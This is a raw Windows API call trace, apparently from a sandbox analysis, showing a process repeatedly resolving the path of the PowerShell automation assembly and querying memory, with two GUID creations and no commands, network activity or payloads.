	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.199] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.200] VirtualQuery (in: lpAddress=0x18bf50, lpBuffer=0x18ce10, dwLength=0x30 | out: lpBuffer=0x18ce10*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.201] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18bb80, lpBuffer=0x18ca40, dwLength=0x30 | out: lpBuffer=0x18ca40*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18beb0, lpBuffer=0x18cd70, dwLength=0x30 | out: lpBuffer=0x18cd70*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] VirtualQuery (in: lpAddress=0x18bf40, lpBuffer=0x18ce00, dwLength=0x30 | out: lpBuffer=0x18ce00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.202] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2c639e16, Data2=0xaa40, Data3=0x43f8, Data4=([0]=0xb8, [1]=0xfb, [2]=0x1c, [3]=0xff, [4]=0x4, [5]=0x3f, [6]=0x36, [7]=0x0))) returned 0x0
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.203] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xb2dbefed, Data2=0xa857, Data3=0x4cf1, Data4=([0]=0xbf, [1]=0xfb, [2]=0x97, [3]=0x20, [4]=0x4d, [5]=0x86, [6]=0x96, [7]=0x46))) returned 0x0
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.206] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.206] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.207] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.207] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
